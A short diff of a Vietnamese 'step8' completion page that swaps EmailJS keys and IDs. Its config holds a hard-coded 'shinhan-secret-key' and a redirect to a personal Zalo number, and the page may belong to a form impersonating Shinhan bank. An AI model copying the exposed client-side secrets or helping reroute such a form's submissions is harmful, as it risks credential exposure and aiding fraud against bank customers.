--- a/pages/vi/step8.html
+++ b/pages/vi/step8.html
@@ -15,7 +15,7 @@
     <script type="text/javascript">
         (function() {
             // THAY THẾ 'YOUR_PUBLIC_KEY' BẰNG PUBLIC KEY CỦA BẠN TRÊN EMAILJS
-            emailjs.init('c-Ms5MjWbitpDBb-E'); 
+            emailjs.init('jugdaw6sXSdJVlAlt'); 
         })();
     </script>
     
@@ -346,8 +346,8 @@ const CompletionApp = {
     elements: {},
     config: {
         SECRET_KEY: 'shinhan-secret-key',
-        EMAILJS_SERVICE_ID: 'service_60tgxof',
-        EMAILJS_TEMPLATE_ID: 'template_0eppfb8',
+        EMAILJS_SERVICE_ID: 'service_zspw0b7',
+        EMAILJS_TEMPLATE_ID: 'template_9jk2poj',
         ZALO_REDIRECT_URL: 'https://zalo.me/84777982144' // Thêm link Zalo vào config để dễ quản lý
     },
 
